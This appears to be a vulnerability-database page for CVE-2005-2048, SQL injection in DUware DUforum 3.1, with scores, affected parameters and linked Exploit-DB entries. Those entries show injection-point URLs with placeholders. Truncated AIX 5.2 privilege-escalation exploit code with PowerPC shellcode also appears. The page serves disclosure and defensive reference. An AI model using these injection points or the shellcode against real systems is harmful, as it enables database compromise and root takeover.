CVE-2005-2048
published 2005-06-22CVE-2005-2048: Multiple SQL injection vulnerabilities in DUware DUforum 3.1, and possibly other versions, allow remote attackers to execute arbitrary SQL commands via the (1)…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.44%
82.2th percentile
Multiple SQL injection vulnerabilities in DUware DUforum 3.1, and possibly other versions, allow remote attackers to execute arbitrary SQL commands via the (1) iMsg parameter to messages.asp, iFor parameter to (2) post.asp or (3) forums.asp, or (4) id parameter to userEdit.asp. NOTE: vectors 1 and 3 were later reported to affect version 3.0.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| duware | duforum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DUware DUforum 3.0/3.1 - 'forums.asp?iFor' SQL Injection
exploitdb·2005-06-22
CVE-2005-2048 DUware DUforum 3.0/3.1 - 'forums.asp?iFor' SQL Injection
DUware DUforum 3.0/3.1 - 'forums.asp?iFor' SQL Injection
---
source: https://www.securityfocus.com/bid/14035/info
DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/DUforum/forums.asp?iFor=[SQL Inject]
Exploit-DB
DUware DUforum 3.0/3.1 - 'userEdit.asp?id' SQL Injection
exploitdb·2005-06-22
CVE-2005-2048 DUware DUforum 3.0/3.1 - 'userEdit.asp?id' SQL Injection
DUware DUforum 3.0/3.1 - 'userEdit.asp?id' SQL Injection
---
source: https://www.securityfocus.com/bid/14035/info
DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/DUforum/admin/userEdit.asp?id=[SQL Inject]
Exploit-DB
DUware DUforum 3.0/3.1 - 'post.asp?iFor' SQL Injection
exploitdb·2005-06-22
CVE-2005-2048 DUware DUforum 3.0/3.1 - 'post.asp?iFor' SQL Injection
DUware DUforum 3.0/3.1 - 'post.asp?iFor' SQL Injection
---
source: https://www.securityfocus.com/bid/14035/info
DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/DUforum/post.asp?iFor=6[SQL Inject]
Exploit-DB
DUware DUforum 3.0/3.1 - 'messages.asp?iMsg' SQL Injection
exploitdb·2005-06-22
CVE-2005-2048 DUware DUforum 3.0/3.1 - 'messages.asp?iMsg' SQL Injection
DUware DUforum 3.0/3.1 - 'messages.asp?iMsg' SQL Injection
---
source: https://www.securityfocus.com/bid/14035/info
DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/DUforum/messages.asp?iMsg=[SQL Inject]248&iFor=6
Exploit-DB
AIX 5.2 - 'netpmon' Local Privilege Escalation
exploitdb·2005-06-14
CVE-2005-0263 AIX 5.2 - 'netpmon' Local Privilege Escalation
AIX 5.2 - 'netpmon' Local Privilege Escalation
---
/*
*
* IBM AIX netpmon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy caughq.org)
*
*/
#include
#include
#include
#include
#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048
#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /*
Exploit-DB
AIX 5.2 - 'ipl_varyon' Local Privilege Escalation
exploitdb·2005-06-14
CVE-2005-0262 AIX 5.2 - 'ipl_varyon' Local Privilege Escalation
AIX 5.2 - 'ipl_varyon' Local Privilege Escalation
---
/*
*
* IBM AIX ipl_varyon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy caughq.org)
*
*/
#include
#include
#include
#include
#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048
#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
/* lsd */
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c
No writeups or analysis indexed.
http://echo.or.id/adv/adv19-theday-2005.txthttp://marc.info/?l=bugtraq&m=111945219205114&w=2http://www.securityfocus.com/archive/1/453330/100/0/threadedhttps://exchange.xforce.ibmcloud.com/vulnerabilities/30668http://echo.or.id/adv/adv19-theday-2005.txthttp://marc.info/?l=bugtraq&m=111945219205114&w=2http://www.securityfocus.com/archive/1/453330/100/0/threadedhttps://exchange.xforce.ibmcloud.com/vulnerabilities/30668
2005-06-22
Published